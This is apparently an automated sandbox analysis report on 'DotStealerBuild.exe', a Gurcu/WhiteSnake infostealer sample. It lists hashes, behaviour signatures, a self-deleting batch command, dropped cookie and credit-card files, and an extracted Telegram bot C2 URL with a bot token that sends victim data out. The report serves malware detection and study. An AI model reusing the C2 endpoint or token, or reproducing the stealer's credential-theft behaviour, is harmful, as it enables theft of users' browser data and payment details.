Analysis

  • max time kernel
    38s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-09-2024 20:09

General

  • Target

    DotStealerBuild.exe

  • Size

    5.6MB

  • MD5

    efdc135bf08ac422784451e17cfa20a7

  • SHA1

    e53453a9f597674c94ea81d246d2754f8515621f

  • SHA256

    f79fbda470eb305348d8a66b3df77c1cf753c21165d0d1741b1fffa9829969d7

  • SHA512

    dfb3faf87353693593d3bd98bbbb771b009741dc114f312179205d8022e4d41500a8eea65a580a304db32ae1368d020bef0826c09199d4f13601fdd11679052c

  • SSDEEP

    98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4557737896&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe
    "C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1300
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7EB1.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7EB1.tmp.bat
      2⤵
        PID:4336

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

      Filesize

      1.7MB

      MD5

      65ccd6ecb99899083d43f7c24eb8f869

      SHA1

      27037a9470cc5ed177c0b6688495f3a51996a023

      SHA256

      aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

      SHA512

      533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

    • C:\Users\Admin\AppData\Local\Temp\tmp7EB1.tmp.bat

      Filesize

      183B

      MD5

      ab4280e4529d5f95e500099537f81e14

      SHA1

      fe815f4f3a014e4dd27a1dd1d5a5d1670188e82c

      SHA256

      f931554e81e527299a8ca0d416274ec2c218f5c5cdef2330ec5f804d536c08c5

      SHA512

      44843c40f335fd2e6daf02296b15e98d80a07bdae9a3af02fc54751ca5fdfe3b49ae4724709de1e29a8a6ee74435b31127d142dbc3d715ca1119e058c61c7f1c

    • C:\Users\Admin\AppData\Roaming\AdminUserCash\COOKIE~1

      Filesize

      20KB

      MD5

      04d4c386aaf03e6dca3ac87334f03d3f

      SHA1

      74627631ce3bd2ba43a12aac39f232da662a32c5

      SHA256

      c130cf082fdce58c9055dba5775490ad8e41055ead5edb0b1e411330144c971d

      SHA512

      01bce1bbdf00825e19c23559ec41a0236b059cec2e891cf4729288b6275aaff62f442b4556c869bfbe17a91475f22dc98522381b2e4f3bef6d1611f7f9f9bc1a

    • C:\Users\Admin\AppData\Roaming\AdminUserCash\CREDIT~1

      Filesize

      232KB

      MD5

      d09803efcbe3f4388d1a22010f53b5b9

      SHA1

      4e3d87890687bc50809ac33d1c4b87d2febc4c6f

      SHA256

      90e5a153e8fdd736699c9b9d04241c317fadf83ddc507530dc56b13902f9188c

      SHA512

      e007c8709e1845cab2bbde611bf3429284341340b8e59950fe7fb1a45e16786a02dd7edc3e67549f3cb057df3c6b4cb17a59587a1ec70890eeaf9a7b0d9c4541

    • memory/1300-14-0x0000011BBA800000-0x0000011BBA822000-memory.dmp

      Filesize

      136KB

    • memory/1300-42-0x0000011BBA8B0000-0x0000011BBA8C2000-memory.dmp

      Filesize

      72KB

    • memory/1300-9-0x0000011BA1150000-0x0000011BA116E000-memory.dmp

      Filesize

      120KB

    • memory/1300-10-0x0000011BB9CD0000-0x0000011BB9D3A000-memory.dmp

      Filesize

      424KB

    • memory/1300-12-0x0000011BBA6B0000-0x0000011BBA762000-memory.dmp

      Filesize

      712KB

    • memory/1300-13-0x0000011BBA7B0000-0x0000011BBA800000-memory.dmp

      Filesize

      320KB

    • memory/1300-0-0x00007FF966E33000-0x00007FF966E35000-memory.dmp

      Filesize

      8KB

    • memory/1300-16-0x0000011BBA870000-0x0000011BBA8AA000-memory.dmp

      Filesize

      232KB

    • memory/1300-17-0x0000011BA1110000-0x0000011BA1136000-memory.dmp

      Filesize

      152KB

    • memory/1300-8-0x00007FF966E30000-0x00007FF9678F1000-memory.dmp

      Filesize

      10.8MB

    • memory/1300-50-0x00007FF966E30000-0x00007FF9678F1000-memory.dmp

      Filesize

      10.8MB

    • memory/1300-51-0x00007FF966E33000-0x00007FF966E35000-memory.dmp

      Filesize

      8KB

    • memory/1300-52-0x00007FF966E30000-0x00007FF9678F1000-memory.dmp

      Filesize

      10.8MB

    • memory/1300-61-0x00007FF966E30000-0x00007FF9678F1000-memory.dmp

      Filesize

      10.8MB

    • memory/1300-7-0x0000011BB9A10000-0x0000011BB9A86000-memory.dmp

      Filesize

      472KB

    • memory/1300-6-0x0000011BA1140000-0x0000011BA114A000-memory.dmp

      Filesize

      40KB

    • memory/1300-1-0x0000011B9EFC0000-0x0000011B9F558000-memory.dmp

      Filesize

      5.6MB